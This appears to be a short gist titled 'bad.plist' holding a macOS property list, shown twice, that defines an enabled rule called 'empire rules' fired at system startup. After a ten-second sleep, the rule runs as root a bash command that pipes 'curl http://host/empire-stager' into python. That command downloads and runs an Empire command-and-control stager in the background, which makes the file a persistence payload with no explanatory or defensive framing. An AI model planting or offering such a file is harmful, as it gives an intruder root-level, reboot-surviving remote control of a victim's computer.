xorrior/bad.plist

## bad.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
	<dict>
		<key>name</key>
		<string>empire rules</string>
		<key>enabled</key>
		<true/>
		<key>eventTypes</key>
		<array>
			<string>startup</string>
		</array>
		<key>actions</key>
		<array>
			<dict>
				<key>command</key>
				<string>/bin/sleep</string>
				<key>user</key>
				<string>root</string>
				<key>arguments</key>
				<array>
					<string>10</string>
				</array>
				<key>type</key>
				<string>RunCommand</string>
			</dict>
			<dict>
				<key>command</key>
				<string>/bin/bash</string>
				<key>user</key>
				<string>root</string>
				<key>arguments</key>
				<array>
					<string>-c</string>
					<string>curl 'http://host/empire-stager' | python &amp;</string>
				</array>
				<key>type</key>
				<string>RunCommand</string>
			</dict>
		</array>
	</dict>
</array>
</plist>
	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
	<plist version="1.0">
	<array>
	<dict>
	<key>name</key>
	<string>empire rules</string>
	<key>enabled</key>
	<true/>
	<key>eventTypes</key>
	<array>
	<string>startup</string>
	</array>
	<key>actions</key>
	<array>
	<dict>
	<key>command</key>
	<string>/bin/sleep</string>
	<key>user</key>
	<string>root</string>
	<key>arguments</key>
	<array>
	<string>10</string>
	</array>
	<key>type</key>
	<string>RunCommand</string>
	</dict>
	<dict>
	<key>command</key>
	<string>/bin/bash</string>
	<key>user</key>
	<string>root</string>
	<key>arguments</key>
	<array>
	<string>-c</string>
	<string>curl 'http://host/empire-stager' \| python &</string>
	</array>
	<key>type</key>
	<string>RunCommand</string>
	</dict>
	</array>
	</dict>
	</array>
	</plist>